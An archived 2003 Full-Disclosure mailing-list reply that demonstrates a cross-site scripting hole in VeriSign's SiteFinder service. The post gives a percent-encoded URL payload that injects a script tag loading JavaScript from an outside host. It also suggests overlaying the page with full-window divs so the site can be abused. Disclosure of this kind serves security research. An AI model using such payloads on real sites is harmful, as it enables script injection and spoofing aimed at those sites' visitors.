[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

RE: [Full-Disclosure] Global *.net XSS, thank you Verisign(TM)



http://sitefinder.verisign.com/lpc?url=%27%3e%3c%73%63%72%69%70%74%20%73%72%63%3d%68%74%74%70%3a%2f%2f%77%77%77%2e%64%65%66%2d%63%6f%6e%2e%6f%72%67%2f%76%65%72%69%73%69%67%6e%2e%6a%73%3e%3c%2f%73%63%72%69%70%74%3e%3c%61%20%27

go ahead and extend the div's to span the window, set the z-index, create
little mojo and this is a site someone can abuse.

anyways, I'm sure you get the idea


On Tue, 16 Sep 2003, Richard M. Smith wrote:

> VeriSign should fix their bug, but I don't see the danger of a
> cross-site scripting error at a non-existent domain.  The scripting code
> can't really do anything at the Web site........
>
> Richard
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html